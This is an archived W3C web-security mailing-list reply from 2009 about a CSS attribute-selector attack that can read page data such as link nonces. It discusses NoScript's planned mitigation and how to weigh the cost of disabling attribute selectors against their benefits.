- From: Adam Barth <w3c@adambarth.com>
- Date: Tue, 8 Dec 2009 01:40:59 -0800
- To: "sird@rckc.at" <sird@rckc.at>
- Cc: gaz Heyes <gazheyes@gmail.com>, Daniel Glazman <daniel@glazman.org>, Thomas Roessler <tlr@w3.org>, public-web-security@w3.org
On Tue, Dec 8, 2009 at 1:37 AM, sird@rckc.at <sird@rckc.at> wrote: > Reading links wouldn't be protected by gareth solution. (nonces on links for > example, and other potential sensitive information..). That's a good example, thanks. > Btw, I think NoScript will start protecting it's users against this attack > on the near future (kudos to Giorgio).. it's a bit complicated because of > @charset rules and UTF BOMs.. but it's probably gonna work.. he is going to > disable attribute selectors (*=, ^=, $=) on some cases.. I'm not aware of > the details yet.. but I think that's great news!! Does Giorgio have a way to measure how commonly he blocks these things? That would be useful information for evaluating the costs of disabling attribute selectors entirely. Before Daniel jumps all over me, I'll say that it's a data point that's worth knowing in balancing the security costs of a feature with its benefits. Adam
Received on Tuesday, 8 December 2009 09:41:52 UTC